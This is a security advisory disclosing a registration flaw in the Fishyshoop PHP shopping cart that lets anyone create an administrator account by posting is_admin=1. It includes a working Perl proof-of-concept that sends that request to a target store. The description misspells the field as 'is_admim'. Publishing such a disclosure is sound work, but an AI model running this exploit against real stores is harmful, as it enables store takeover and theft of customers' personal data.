Synopsis ======== The Fishyshoop shopping cart software contains a vulnerability which allows arbitrary users to create accounts with administrator privileges Background ========== Fishyshoop is a suite of PHP scripts allowing anybody to create an attractive online store. Affected Versions ================= Verified on 0.930 beta. Previous versions may also be affected. Impact ====== The user gains administrator privileges in the software, meaning they are free to alter many aspects of the store, as well as committing theft of personal information belonging to other users of the store. Description =========== pages/register/register.php takes every POST variable and inserts the value into a new record under a field with the same name. If a new registration is made with the variable is_admim set to 1, the account will have administrator privileges on the site. Proof of Concept ================ #!/usr/bin/perl use WWW::Curl::Easy; sub usage() { print "$0 <Fishyshoop root URL> <Desired E-Mail> <Desired Password>n"; exit(); } $FSURL=shift or usage(); $UNAME=shift or usage(); $PASS=shift or usage(); my $fishyshoop = new WWW::Curl::Easy; $fishyshoop->setopt(CURLOPT_URL, "$FSURL?L=register.register"); $fishyshoop->setopt(CURLOPT_POST, 1); $fishyshoop->setopt(CURLOPT_POSTFIELDS, "email=$UNAME&password=$PASS&is_admin=1&submit=1"); $fishyshoop->perform;